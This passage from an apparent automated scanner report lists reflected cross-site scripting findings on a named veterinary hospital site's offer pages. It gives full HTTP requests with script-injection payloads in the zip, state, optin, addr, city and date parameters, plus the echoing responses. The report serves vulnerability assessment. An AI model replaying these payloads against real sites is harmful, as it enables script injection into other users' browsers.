525253d%25252526city%2525253d%25252526date%2525253d1307084400%25252526email%2525253d%25252526fname%2525253d%25252526formtype%2525253dCORP%25252526guid%2525253dFBBB127E-9283-4C9A-8A61-A34D07FC7146%25252526ipaddress%2525253d173.193.214.243%25252526lname%2525253d%25252526newmex%2525253d0%25252526optin%2525253d%25252526other%2525253d%25252526petage%2525253d%25252526petname%2525253d%25252526pettype%2525253d%25252526phone%2525253d%25252526referer%2525253d%25252526state%2525253d%25252526submit%2525253dGet%2525252bFREE%2525252bCoupon%25252526token%2525253d81c834ba6ebffe11ddefbac1e3647bda%25252526tollfree%2525253d866-825-8416%25252526uri%2525253dhttp%252525253a%252525252f%252525252fwww.vcahospitals.com%252525252fmain%252525252foffer%25252526useragent%2525253dMozilla%252525252f4.0%2525252b(compatible%252525253b%2525252bMSIE%2525252b6.0%252525253b%2525252bWindows%2525252bNT%2525252b5.1%252525253b%2525252bSV1%252525253b%2525252b.NET%2525252bCLR%2525252b1.1.4322)%25252526variant%2525253d%25252526zip%2525253d%252526useragent%25253dMozilla%2525252f4.0%25252b(compatible%2525253b%25252bMSIE%25252b6.0%2525253b%25252bWindows%25252bNT%25252b5.1%2525253b%25252bSV1%2525253b%25252b.NET%25252bCLR%25252b1.1.4322)%252526variant%25253d%252526zip%25253d%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=83dad"><script>alert(1)</script>b2542e55643 &zip= HTTP/1.1 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; 
.NET4.0E) Proxy-Connection: Keep-Alive Host: www.vcahospitals.com
Response
HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:18:39 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=ohcttmqldd2o8ov91qf8l0ptp6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 21807

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-...[SNIP]...
IE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=83dad"><script>alert(1)</script>b2542e55643 &zip=" method="POST" name="offer-form" id="offer-form" class="input-form">...[SNIP]...
2.52. http://www.vcahospitals.com/main/offer [zip parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /main/offer
Issue detail
The value of the zip request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 835b4"><script>alert(1)</script>e5f0d47fe97 was submitted in the zip parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /main/offer?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3d95D5FB0B-779F-4D18-9C9E-501AD398C559%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3d%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3ddda68e64d460e98531171085a5a8ad78%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dD4DE5467-1E6D-4C3E-80D6-E52DB1140F3A%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253d%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253dc6268853c430a181c06a3eda75dae1a1%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25253faddr%25253d%252526city%25253d%252526date%25253d1307084400%252526email%25253d%252526fname%25253d%252526formtype%25253dCORP%252526guid%25253d6770E3F2-2A04-4662-AEB3-FE70D3111F6D%252526ipaddress%25253d173.193.214.243%252526lname%25253d%252526newmex%25253d0%252526optin%25253d%252526other%25253d%252526petage%25253d%252526petname%25253d%252526pettype%25253d%252526phone%25253d%252526referer%25253d%252526state%25253d%252526submit%25253dGet%25252bFREE%25252bCoupon%252526token%25253dcdbd8b098f8070e3c19207ef06a5e6e1%252526tollfree%25253d866-825-8416%252526uri%25253dhttp%2525253a%2525252f%2525252fwww.vcahospitals.com%2525252fmain%2525252foffer%2525253faddr%2
525253d%25252526city%2525253d%25252526date%2525253d1307084400%25252526email%2525253d%25252526fname%2525253d%25252526formtype%2525253dCORP%25252526guid%2525253dFBBB127E-9283-4C9A-8A61-A34D07FC7146%25252526ipaddress%2525253d173.193.214.243%25252526lname%2525253d%25252526newmex%2525253d0%25252526optin%2525253d%25252526other%2525253d%25252526petage%2525253d%25252526petname%2525253d%25252526pettype%2525253d%25252526phone%2525253d%25252526referer%2525253d%25252526state%2525253d%25252526submit%2525253dGet%2525252bFREE%2525252bCoupon%25252526token%2525253d81c834ba6ebffe11ddefbac1e3647bda%25252526tollfree%2525253d866-825-8416%25252526uri%2525253dhttp%252525253a%252525252f%252525252fwww.vcahospitals.com%252525252fmain%252525252foffer%25252526useragent%2525253dMozilla%252525252f4.0%2525252b(compatible%252525253b%2525252bMSIE%2525252b6.0%252525253b%2525252bWindows%2525252bNT%2525252b5.1%252525253b%2525252bSV1%252525253b%2525252b.NET%2525252bCLR%2525252b1.1.4322)%25252526variant%2525253d%25252526zip%2525253d%252526useragent%25253dMozilla%2525252f4.0%25252b(compatible%2525253b%25252bMSIE%25252b6.0%2525253b%25252bWindows%25252bNT%25252b5.1%2525253b%25252bSV1%2525253b%25252b.NET%25252bCLR%25252b1.1.4322)%252526variant%25253d%252526zip%25253d%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip=835b4"><script>alert(1)</script>e5f0d47fe97 HTTP/1.1 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; 
.NET4.0E) Proxy-Connection: Keep-Alive Host: www.vcahospitals.com
Response
HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:18:46 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=9duq7ra7irdi2bi4ngj9f38dk7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 21850

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-...[SNIP]...
6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip=835b4"><script>alert(1)</script>e5f0d47fe97 " method="POST" name="offer-form" id="offer-form" class="input-form">...[SNIP]...
2.53. http://www.vcahospitals.com/main/offer/ [ parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /main/offer/
Issue detail
The value of the request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a4ae"><script>alert(1)</script>6cab6f57fc7 was submitted in the parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /main/offer/?=37a4ae"><script>alert(1)</script>6cab6f57fc7 &state=FL&optin=1&guid=EB9CB843-C06F-419A-A604-9D3CF6F5CC77&referer=http%3A%2F%2Fwww.vcahospitals.com%2Fmain%2Foffer%2Fthank-you.html%3F HTTP/1.1
Referer: http://www.vcahospitals.com/main/offer/thank-you.html?
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.vcahospitals.com
Cookie: PHPSESSID=1af1jedp03fokmt067uielfdf6
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:17:53 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 14710

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-...[SNIP]...
<form action="http://www.vcahospitals.com/main/offer/thank-you.html?=37a4ae"><script>alert(1)</script>6cab6f57fc7 &state=FL&optin=1&guid=EB9CB843-C06F-419A-A604-9D3CF6F5CC77&referer=http%3A%2F%2Fwww.vcahospitals.com%2Fmain%2Foffer%2Fthank-you.html%3F" method="POST" name="offer-form" id="offer-form" class="input-fo...[SNIP]...
2.54. http://www.vcahospitals.com/main/offer/ [&optin parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /main/offer/
Issue detail
The value of the &optin request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80fb4"><script>alert(1)</script>58eba80557c was submitted in the &optin parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /main/offer/?&optin=180fb4"><script>alert(1)</script>58eba80557c &guid=EB9CB843-C06F-419A-A604-9D3CF6F5CC77&referer=http%3A%2F%2Fwww.vcahospitals.com%2Fmain%2Foffer%2Fthank-you.html%3F HTTP/1.1
Referer: http://www.vcahospitals.com/main/offer/thank-you.html?
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.vcahospitals.com
Cookie: PHPSESSID=1af1jedp03fokmt067uielfdf6
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:16:06 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 14650

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-...[SNIP]...
<form action="http://www.vcahospitals.com/main/offer/thank-you.html?&optin=180fb4"><script>alert(1)</script>58eba80557c &guid=EB9CB843-C06F-419A-A604-9D3CF6F5CC77&referer=http%3A%2F%2Fwww.vcahospitals.com%2Fmain%2Foffer%2Fthank-you.html%3F" method="POST" name="offer-form" id="offer-form" class="input-form">...[SNIP]...
2.55. http://www.vcahospitals.com/main/offer/ [&state parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /main/offer/
Issue detail
The value of the &state request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3fc88"><script>alert(1)</script>a3145493564 was submitted in the &state parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /main/offer/?&state=FL3fc88"><script>alert(1)</script>a3145493564 &optin=1&guid=EB9CB843-C06F-419A-A604-9D3CF6F5CC77&referer=http%3A%2F%2Fwww.vcahospitals.com%2Fmain%2Foffer%2Fthank-you.html%3F HTTP/1.1
Referer: http://www.vcahospitals.com/main/offer/thank-you.html?
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.vcahospitals.com
Cookie: PHPSESSID=1af1jedp03fokmt067uielfdf6
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:15:59 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 14686

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-...[SNIP]...
<form action="http://www.vcahospitals.com/main/offer/thank-you.html?&state=FL3fc88"><script>alert(1)</script>a3145493564 &optin=1&guid=EB9CB843-C06F-419A-A604-9D3CF6F5CC77&referer=http%3A%2F%2Fwww.vcahospitals.com%2Fmain%2Foffer%2Fthank-you.html%3F" method="POST" name="offer-form" id="offer-form" class="input-form">...[SNIP]...
2.56. http://www.vcahospitals.com/main/offer/ [addr parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /main/offer/
Issue detail
The value of the addr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a42b0"><script>alert(1)</script>3f63bb4fc1f was submitted in the addr parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /main/offer/?addr=a42b0"><script>alert(1)</script>3f63bb4fc1f &city=&date=1307084400&email=&fname=&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dB195437C-383C-4662-A7E6-660604A74096%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252fthank-you.html%253f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3de6e484fe2fcc9bde4e2bc7b103257d23%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&state=&submit=Get+FREE+Coupon&token=85b87f93a1fb171a2c0d27f6b230c5fd&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dC076635C-7A84-49B0-8786-FD89A1026CF5%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3d0715c7e3a8b4eb7e7fdaa7694658de2c%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dB195437C-383C-4662-A7E6-660604A74096%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww
.vcahospitals.com%25252fmain%25252foffer%25252fthank-you.html%25253f%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253de6e484fe2fcc9bde4e2bc7b103257d23%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252f%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Proxy-Connection: Keep-Alive Host: www.vcahospitals.com
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:15:55 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Set-Cookie: PHPSESSID=7hsjo72anm75fuu66qlgrcdl51; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 19845 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content-...[SNIP]... <form action="http://www.vcahospitals.com/main/offer/thank-you.html?addr=a42b0"><script>alert(1)</script>3f63bb4fc1f &city=&date=1307084400&email=&fname=&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2f...[SNIP]...
2.57. http://www.vcahospitals.com/main/offer/ [city parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /main/offer/
Issue detail
The value of the city request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a762"><script>alert(1)</script>ca37e104d6b was submitted in the city parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /main/offer/?addr=&city=2a762"><script>alert(1)</script>ca37e104d6b &date=1307084400&email=&fname=&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dB195437C-383C-4662-A7E6-660604A74096%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252fthank-you.html%253f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3de6e484fe2fcc9bde4e2bc7b103257d23%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&state=&submit=Get+FREE+Coupon&token=85b87f93a1fb171a2c0d27f6b230c5fd&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dC076635C-7A84-49B0-8786-FD89A1026CF5%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3d0715c7e3a8b4eb7e7fdaa7694658de2c%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dB195437C-383C-4662-A7E6-660604A74096%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww
.vcahospitals.com%25252fmain%25252foffer%25252fthank-you.html%25253f%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253de6e484fe2fcc9bde4e2bc7b103257d23%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252f%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Proxy-Connection: Keep-Alive Host: www.vcahospitals.com
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:16:00 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Set-Cookie: PHPSESSID=fo15h1tlhcbbnb166klq5i4j61; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 19845 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content-...[SNIP]... <form action="http://www.vcahospitals.com/main/offer/thank-you.html?addr=&city=2a762"><script>alert(1)</script>ca37e104d6b &date=1307084400&email=&fname=&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vc...[SNIP]...
2.58. http://www.vcahospitals.com/main/offer/ [date parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /main/offer/
Issue detail
The value of the date request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67b79"><script>alert(1)</script>b01a5b3d5be was submitted in the date parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /main/offer/?addr=&city=&date=130708440067b79"><script>alert(1)</script>b01a5b3d5be &email=&fname=&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dB195437C-383C-4662-A7E6-660604A74096%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252fthank-you.html%253f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3de6e484fe2fcc9bde4e2bc7b103257d23%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&state=&submit=Get+FREE+Coupon&token=85b87f93a1fb171a2c0d27f6b230c5fd&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dC076635C-7A84-49B0-8786-FD89A1026CF5%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3d0715c7e3a8b4eb7e7fdaa7694658de2c%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dB195437C-383C-4662-A7E6-660604A74096%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww
